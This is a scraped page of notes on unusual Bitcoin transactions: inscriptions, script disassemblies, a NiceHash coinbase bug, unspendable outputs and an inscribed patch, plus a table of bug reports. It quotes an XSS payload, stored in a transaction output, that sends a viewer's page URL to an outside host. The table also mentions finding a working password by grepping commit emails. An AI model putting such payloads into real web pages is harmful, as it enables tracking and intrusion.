From their site:
OCM Genesis is our flagship generative art collection that's set many historic precedents since its launch in 2021. Genesis is the first NFT collection where all 10,000 images and metadata (similar to DNA describing the NFT) were generated using code entirely on-chain in a single transaction on Ethereum. With the launch of Bitcoin Ordinals, Genesis is the first ever collection of 10,000 images to be inscribed on Bitcoin in 2023.
Some of their likely transactions were noted in our list of large transactions: github.com/cirosantilli/bitcoin-inscription-indexer/blob/master/data/payload_size_out e.g.:but we haven't had the patience to index them properly yet. Boring art anyways.
004c3f1efa0095b229dd05ea247c94a5af742daf682fb082a6e62f4aeeb973f2 66033
ffc73ef454d512f98a451960e05a0a036406ed1078a1bd7082fd4036cf0af067 66021 4373b97e4525be4c2f4b491be9f14ac2b106ba521587dad8f134040d16ff73af by 
Ciro Santilli 37 Updated 2025-07-16
Ciro Santilli 37 Updated 2025-07-16Output 0 does:where the large constant is an interesting inscription to test for the presence of XSS attacks on blockchain explorers:This is almost spendable with:but that fails because the altstack is cleared between the input and the output script, so this output is provably unspendable.
OP_ADD OP_ADD 13 OP_EQUAL OP_NOTIF OP_RETURN OP_ENDIF OP_FROMALTSTACK <large xss constant> OP_DROP<script type='text/javascript'>document.write('<img src='http://www.trollbot.org/xss-blockchain-detector.php?href=' + location.href + ''>');</script>`1 OP_TOALTSTACK 10 1 2 5660d06bd69326c18ec63127b37fb3b32ea763c3846b3334c51beb6a800c57d3 by Ciro Santilli 37 Updated 2025-07-16
Ciro Santilli 37 Updated 2025-07-16In this malformed Coinbase transaction, the mining pool "nicehash" produced a provably unspendable Bitcoin output script due to a bug, and therefore lost most of the entire block reward of 6.25 BTC then worth about $ 123,000.
The output is unspendable because it ends in a constant 0, the disassembly of the first and main output is this series of constants:and for the second smaller one:the third one being an OP_RETURN message.
0 017fed86bba5f31f955f8b316c7fb9bd45cb6cbc 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0aa21a9ed62ec16bf1a388c7884e9778ddb0e26c0bf982dada47aaa5952347c0993da 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0This event received some coverage:
a165c82cf21a6bae54dde98b7e00ab43b695debb59dfe7d279ac0c59d6043e24 by Ciro Santilli 37 Updated 2025-07-16
Ciro Santilli 37 Updated 2025-07-16Sister transaction of 4373b97e4525be4c2f4b491be9f14ac2b106ba521587dad8f134040d16ff73af with another variant of the XSS but without IF and
OP_FROMALTSTACK, thus making it spendable:OP_ADD OP_ADD 13 OP_EQUAL <large xss constant> OP_DROP 3ad6677303fb6f700a4f2f977fe86e5324e0ddb0d3b33a649e513d7e88904e85 by Ciro Santilli 37 Updated 2025-07-16
Ciro Santilli 37 Updated 2025-07-16This contains various outputs that seem trivially spendable in a made up of two non-zero constants, e.g.:Or are we missing something? The values are quite small and wouldn't be worth it the miner fees most likely. But is there a fundamental reason why this couldn't be spent by a non-standard miner?
{
"value": 0.00002000,
"n": 9,
"scriptPubKey": {
"asm": "1 8fe61f026c7545a99c6e0f37a5a7eceee5fdf6723c1994ccbfb740556632e9fe",
"desc": "rawtr(8fe61f026c7545a99c6e0f37a5a7eceee5fdf6723c1994ccbfb740556632e9fe)#lxgt8lak",
"hex": "51208fe61f026c7545a99c6e0f37a5a7eceee5fdf6723c1994ccbfb740556632e9fe",
"address": "bc1p3lnp7qnvw4z6n8rwpum6tflvamjlmanj8svefn9lkaq92e3ja8lqcc8mcx",
"type": "witness_v1_taproot"
}
}, 77822fd6663c665104119cb7635352756dfc50da76a92d417ec1a12c518fad69 by Ciro Santilli 37 Updated 2025-07-16
Ciro Santilli 37 Updated 2025-07-16Ouptut 0 disassembles as:The large constant contains an ASCII Bitcoin Core patch entitled
OP_IF OP_INVALIDOPCODE 4effffffff <large constant> OP_ENDIFRemove (SINGLE|DOUBLE)BYTE so presumably this is a proof of concept:From a3a61fef43309b9fb23225df7910b03afc5465b9 Mon Sep 17 00:00:00 2001
From: Satoshi Nakamoto <satoshin@gmx.com>
Date: Mon, 12 Aug 2013 02:28:02 -0200
Subject: [PATCH] Remove (SINGLE|DOUBLE)BYTE
I removed this from Bitcoin in f1e1fb4bdef878c8fc1564fa418d44e7541a7e83
in Sept 7 2010, almost three years ago. Be warned that I have not
actually tested this patch.
---
backends/bitcoind/deserialize.py | 8 +-------
1 file changed, 1 insertion(+), 7 deletions(-)
diff --git a/backends/bitcoind/deserialize.py b/backends/bitcoind/deserialize.py
index 6620583..89b9b1b 100644
--- a/backends/bitcoind/deserialize.py
+++ b/backends/bitcoind/deserialize.py
@@ -280,10 +280,8 @@ opcodes = Enumeration("Opcodes", [
"OP_WITHIN", "OP_RIPEMD160", "OP_SHA1", "OP_SHA256", "OP_HASH160",
"OP_HASH256", "OP_CODESEPARATOR", "OP_CHECKSIG", "OP_CHECKSIGVERIFY", "OP_CHECKMULTISIG",
"OP_CHECKMULTISIGVERIFY",
- ("OP_SINGLEBYTE_END", 0xF0),
- ("OP_DOUBLEBYTE_BEGIN", 0xF000),
"OP_PUBKEY", "OP_PUBKEYHASH",
- ("OP_INVALIDOPCODE", 0xFFFF),
+ ("OP_INVALIDOPCODE", 0xFF),
])
@@ -293,10 +291,6 @@ def script_GetOp(bytes):
vch = None
opcode = ord(bytes[i])
i += 1
- if opcode >= opcodes.OP_SINGLEBYTE_END and i < len(bytes):
- opcode <<= 8
- opcode |= ord(bytes[i])
- i += 1
if opcode <= opcodes.OP_PUSHDATA4:
nSize = opcode
--
1.7.9.4bitcointalk.org/index.php?topic=5231222.0 discusses what happens if there is an invalid opcode in a branch that is not taken.
Some of the contributions are subjectively self evaluated based on:
Ciro Santilli's open source contributions Bug reports and feature requests by Ciro Santilli 37 Updated 2025-07-16
Ciro Santilli 37 Updated 2025-07-16This shall not list bugs solved by my accepted pull requests.
| Date | Project | Size | Description |
|---|---|---|---|
| 2016-05 | All GitHub Commit Emails | 1 | Password disclosure grep password on email data. Gmail password worked and user confirmed. |
Disclaimer: closed source vendors tend to be highly secretive, solving small issues without any reply, so I use my best judgement given the lack of feedback.
There are unlisted articles, also show them or only show them.